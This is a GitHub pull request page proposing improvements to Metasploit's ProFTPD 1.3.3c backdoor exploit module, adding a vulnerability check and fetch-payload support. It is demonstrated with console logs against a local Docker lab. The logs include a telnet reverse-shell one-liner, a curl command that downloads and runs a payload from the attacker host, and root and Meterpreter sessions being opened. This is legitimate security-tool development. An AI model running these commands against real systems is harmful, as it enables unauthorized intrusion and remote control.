Skip to content

proftpd_133c_backdoor: Various improvements#21381

Open
g0tmi1k wants to merge 9 commits intorapid7:masterfrom
g0tmi1k:proftpd_133c_backdoor
Open

proftpd_133c_backdoor: Various improvements#21381
g0tmi1k wants to merge 9 commits intorapid7:masterfrom
g0tmi1k:proftpd_133c_backdoor

Conversation

@g0tmi1k
Copy link
Copy Markdown
Contributor

@g0tmi1k g0tmi1k commented Apr 27, 2026
edited
Loading

This PR is to:

  • Add check function
  • Update module metadata (notes)
  • Update payload (now supports fetch payloads)
  • Able to be more verbose

Setup

$ docker pull registry.gitlab.com/g0tmi1k/proftpd-docker:1.3.3c
[...]
$ 
$ docker run --rm -p 2121:21 -p 40000-40100:40000-40100 --name proftpd registry.gitlab.com/g0tmi1k/proftpd-docker:1.3.3c
957886ff9327 - ProFTPD 1.3.3c (maint) (built Mon Apr 27 2026 11:29:16 UTC) standalone mode STARTUP

Before

$ git checkout master
[...]
$ ./msfconsole -q -x 'db_status; workspace -D; 
setg VERBOSE true; setg RHOSTS 127.0.0.1; setg LHOST docker0;'
[...]
msf > use proftpd_133c_backdoor

Matching Modules
================

   #  Name                                    Disclosure Date  Rank       Check  Description
   -  ----                                    ---------------  ----       -----  -----------
   0  exploit/unix/ftp/proftpd_133c_backdoor  2010-12-02       excellent  No     ProFTPD 1.3.3c Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/proftpd_133c_backdoor

[*] Using exploit/unix/ftp/proftpd_133c_backdoor
msf exploit(unix/ftp/proftpd_133c_backdoor) > options

Module options (exploit/unix/ftp/proftpd_133c_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf exploit(unix/ftp/proftpd_133c_backdoor) > set RPORT 2121
RPORT => 2121
msf exploit(unix/ftp/proftpd_133c_backdoor) > check
[-] This module does not support check.
msf exploit(unix/ftp/proftpd_133c_backdoor) > run
[-] 127.0.0.1:2121 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
msf exploit(unix/ftp/proftpd_133c_backdoor) > set PAYLOAD payload/cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
msf exploit(unix/ftp/proftpd_133c_backdoor) > run
[+] sh -c '(sleep 3847|telnet 172.17.0.1 4444|while : ; do sh && break; done 2>&1|telnet 172.17.0.1 4444 >/dev/null 2>&1 &)'
[*] Started reverse TCP double handler on 172.17.0.1:4444
[*] 127.0.0.1:2121 - Connecting to FTP server 127.0.0.1:2121...
[*] 127.0.0.1:2121 - Connected to target FTP server.
[*] 127.0.0.1:2121 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 8PW5FyMkatIE2Cdb;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "8PW5FyMkatIE2Cdb\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:36802) at 2026-04-27 12:31:33 +0100

id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
^Z
Background session 1? [y/N]  y
msf exploit(unix/ftp/proftpd_133c_backdoor) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      0         1      0      0      0

msf exploit(unix/ftp/proftpd_133c_backdoor) > vulns

Vulnerabilities
===============

Timestamp                Host       Service  Resource  Name                                       References
---------                ----       -------  --------  ----                                       ----------
2026-04-27 11:31:32 UTC  127.0.0.1  None     {}        ProFTPD 1.3.3c Backdoor Command Execution  CVE-2010-20103,OSVDB-69562,BID-45150

msf exploit(unix/ftp/proftpd_133c_backdoor) >

After

$ git checkout proftpd_133c_backdoor
[...]
$ ./msfconsole -q -x 'db_status; workspace -D;
setg VERBOSE true; setg RHOSTS 127.0.0.1; setg LHOST docker0;'
[...]
msf > use proftpd_133c_backdoor

Matching Modules
================

   #  Name                                    Disclosure Date  Rank       Check  Description
   -  ----                                    ---------------  ----       -----  -----------
   0  exploit/unix/ftp/proftpd_133c_backdoor  2010-12-02       excellent  Yes    ProFTPD 1.3.3c Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/proftpd_133c_backdoor

[*] Using exploit/unix/ftp/proftpd_133c_backdoor
[*] Using configured payload cmd/linux/http/x86/meterpreter_reverse_tcp
msf exploit(unix/ftp/proftpd_133c_backdoor) > options

Module options (exploit/unix/ftp/proftpd_133c_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/linux/http/x86/meterpreter_reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash,
                                              zsh) (Accepted: none, python3.8+, shell-search, shell)
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH                    no        Local URI to use for serving payload
   LHOST           docker0          yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


   When FETCH_COMMAND is one of CURL,GET,WGET:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


   When FETCH_FILELESS is none:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      APuvOFYvpZ       no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces


Exploit target:

   Id  Name
   --  ----
   0   Linux/Unix Command



View the full module info with the info, or info -d command.

msf exploit(unix/ftp/proftpd_133c_backdoor) > set RPORT 2121
RPORT => 2121
msf exploit(unix/ftp/proftpd_133c_backdoor) > check
[*] 127.0.0.1:2121 - Connecting to FTP server 127.0.0.1:2121...
[*] 127.0.0.1:2121 - Connected to target FTP server.
[*] 127.0.0.1:2121 - FTP Banner: 220 ProFTPD 1.3.3c Server (ProFTPD Docker Installation) [172.17.0.2]
[*] 127.0.0.1:2121 - ProFTPD 1.3.3c detected, testing for backdoor command...
[*] 127.0.0.1:2121 - The target appears to be vulnerable. Sending backdoor command did not return an error (uninfected would/should)
msf exploit(unix/ftp/proftpd_133c_backdoor) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         0      0      0      0

msf exploit(unix/ftp/proftpd_133c_backdoor) > services
Services
========

host       port  proto  name  state  info                                                                  resource  parents
----       ----  -----  ----  -----  ----                                                                  --------  -------
127.0.0.1  2121  tcp    ftp   open   220 ProFTPD 1.3.3c Server (ProFTPD Docker Installation) [172.17.0.2]  {}

msf exploit(unix/ftp/proftpd_133c_backdoor) > run
[*] Command to run on remote host: curl -so ./HoynWYnkdSz http://172.17.0.1:8080/-j0Kg1-XEKLxv08PWln5tg;chmod +x ./HoynWYnkdSz;./HoynWYnkdSz&
[*] Fetch handler listening on 172.17.0.1:8080
[*] HTTP server started
[*] Adding resource /-j0Kg1-XEKLxv08PWln5tg
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] 127.0.0.1:2121 - Running automatic check ("set AutoCheck false" to disable)
[*] 127.0.0.1:2121 - Connecting to FTP server 127.0.0.1:2121...
[*] 127.0.0.1:2121 - Connected to target FTP server.
[*] 127.0.0.1:2121 - FTP Banner: 220 ProFTPD 1.3.3c Server (ProFTPD Docker Installation) [172.17.0.2]
[*] 127.0.0.1:2121 - ProFTPD 1.3.3c detected, testing for backdoor command...
[+] 127.0.0.1:2121 - The target appears to be vulnerable. Sending backdoor command did not return an error (uninfected would/should)
[*] 127.0.0.1:2121 - Connecting to FTP server 127.0.0.1:2121...
[*] 127.0.0.1:2121 - Connected to target FTP server.
[*] 127.0.0.1:2121 - FTP Banner: 220 ProFTPD 1.3.3c Server (ProFTPD Docker Installation) [172.17.0.2]
[*] 127.0.0.1:2121 - Sending backdoor command
[*] 127.0.0.1:2121 - Running: nohup curl -so ./HoynWYnkdSz http://172.17.0.1:8080/-j0Kg1-XEKLxv08PWln5tg;chmod +x ./HoynWYnkdSz;./HoynWYnkdSz& >/dev/null 2>&1
[*] Client 172.17.0.2 requested /-j0Kg1-XEKLxv08PWln5tg
[*] Sending payload to 172.17.0.2 (curl/8.14.1)
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:47446) at 2026-04-27 13:00:45 +0100

meterpreter > background
[*] Backgrounding session 1...
msf exploit(unix/ftp/proftpd_133c_backdoor) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         1      0      0      1

msf exploit(unix/ftp/proftpd_133c_backdoor) > services
Services
========

host       port  proto  name  state  info                                                                  resource  parents
----       ----  -----  ----  -----  ----                                                                  --------  -------
127.0.0.1  2121  tcp    ftp   open   220 ProFTPD 1.3.3c Server (ProFTPD Docker Installation) [172.17.0.2]  {}

msf exploit(unix/ftp/proftpd_133c_backdoor) > vulns

Vulnerabilities
===============

Timestamp                Host       Service         Resource  Name                                    References
---------                ----       -------         --------  ----                                    ----------
2026-04-27 12:00:35 UTC  127.0.0.1  ftp (2121/tcp)  {}        exploit/unix/ftp/proftpd_133c_backdoor  CVE-2010-20103,OSVDB-69562,BID-45150

msf exploit(unix/ftp/proftpd_133c_backdoor) > notes

Notes
=====

 Time                     Host       Service  Port  Protocol  Type                         Data
 ----                     ----       -------  ----  --------  ----                         ----
 2026-04-27 12:00:45 UTC  127.0.0.1                           host.os.session_fingerprint  {:name=>"aa233a48d7f1", :os=>"Debian 13.4 (Linux 6.19.11+kali-amd64)", :arch=>"x64"}

msf exploit(unix/ftp/proftpd_133c_backdoor) >

@g0tmi1k g0tmi1k force-pushed the proftpd_133c_backdoor branch 4 times, most recently from bd308de to 53e084a Compare April 30, 2026 11:58
@g0tmi1k g0tmi1k changed the title proftpd_133c_backdoor: Add check and fetch payloads proftpd_133c_backdoor: Various improvements May 4, 2026
@g0tmi1k g0tmi1k force-pushed the proftpd_133c_backdoor branch 5 times, most recently from be9061b to 60e8337 Compare May 5, 2026 17:47
@g0tmi1k
Copy link
Copy Markdown
Contributor Author

g0tmi1k commented May 5, 2026

This now needs #21380 to be merged ahead of time.

@g0tmi1k g0tmi1k force-pushed the proftpd_133c_backdoor branch 4 times, most recently from 019d56c to 5464e8d Compare May 6, 2026 13:59
@g0tmi1k g0tmi1k force-pushed the proftpd_133c_backdoor branch from ab7e620 to 3320003 Compare May 6, 2026 16:28
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

Metasploit Kanban
Status: Todo

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@g0tmi1k @smcintyre-r7